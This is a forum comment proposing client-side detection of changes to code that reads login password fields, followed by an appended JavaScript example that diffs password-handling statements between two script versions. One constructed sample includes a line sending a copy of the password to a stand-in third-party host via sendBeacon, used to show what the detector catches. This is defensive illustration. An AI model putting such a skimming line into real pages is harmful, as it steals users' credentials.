by lucb1e
3018 days ago
> So customers are skilled enough to check the (webpacked together with other stuff and minified) JS code running in their browser before they run it?

Rather than posing the obvious as a question, yes, I am aware that the overwhelming majority of users will not be able to inspect it themselves. But there are also loads of people who are, and we also roam the internet. And it's not about inspecting before it runs, it's about noticing weird changes before you typed your credentials.

Currently it's a strange idea to open an element inspector before regular actions such as logging in, and indeed, it'd be quite the hassle. But if this were commonplace I imagine tools would jump up to aid in this for both experts and laymen. It isn't terribly hard to trace which pieces of code do something with the password field (such as reading out its value, and trace where the variable is used and copied to) and alert on changes to those. Upon such an alert, customers of a bank might wait a few days to see if there was a breach, and security experts of said bank might like to see the diff that the browser detected.

Just a thought of what could be if security was applied client-side more often.
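The check described in the comment above, as an added example that is not part of the original comment: it finds the statements that read the password field, follows the variables the value is copied into, and reports what changed between two versions of a script. The function names, the regex heuristics and both sample scripts are constructed for illustration; a real tool would use a JavaScript parser instead of splitting on `;`.

```javascript
// Heuristic assumption: these patterns mark a read of the password field.
const PASSWORD_SOURCE = /type=["']?password|getElementById\(["']password["']\)/i;

// Return the statements that read the password field or use a variable
// that (transitively) received its value.
function passwordTouchingStatements(source) {
  const statements = source.split(/[;\n]/).map((s) => s.trim()).filter(Boolean);
  const tainted = new Set(); // variable names currently holding the password
  const hits = [];
  for (const stmt of statements) {
    const usesTainted = [...tainted].some((v) => new RegExp(`\\b${v}\\b`).test(stmt));
    if (!PASSWORD_SOURCE.test(stmt) && !usesTainted) continue;
    hits.push(stmt);
    // If the statement assigns to a variable, that variable is now tainted too.
    const assign = stmt.match(/^(?:(?:const|let|var)\s+)?([A-Za-z_]\w*)\s*=(?!=)/);
    if (assign) tainted.add(assign[1]);
  }
  return hits;
}

// Compare the password-handling statements of two script versions.
function diffPasswordHandling(baselineSource, currentSource) {
  const before = new Set(passwordTouchingStatements(baselineSource));
  const after = new Set(passwordTouchingStatements(currentSource));
  const added = [...after].filter((s) => !before.has(s));
  const removed = [...before].filter((s) => !after.has(s));
  return { alert: added.length > 0 || removed.length > 0, added, removed };
}

// Constructed sample: the login script as seen on a previous visit.
const BASELINE = `
const pw = document.querySelector("input[type=password]").value;
const theme = localStorage.getItem("theme");
fetch("/login", { method: "POST", body: pw });
`;

// Constructed sample: a later version. The theme change is unrelated to the
// password; the copy and the second network call are not.
const CHANGED = `
const pw = document.querySelector("input[type=password]").value;
const theme = localStorage.getItem("colour-theme");
const copy = pw;
fetch("/login", { method: "POST", body: pw });
navigator.sendBeacon("https://third-party.example/collect", copy);
`;

console.log(diffPasswordHandling(BASELINE, CHANGED));
```

The `added` list in the result is the diff the comment suggests a bank's security team would want to see; changes that never touch the password value, such as the theme line, do not raise the alert.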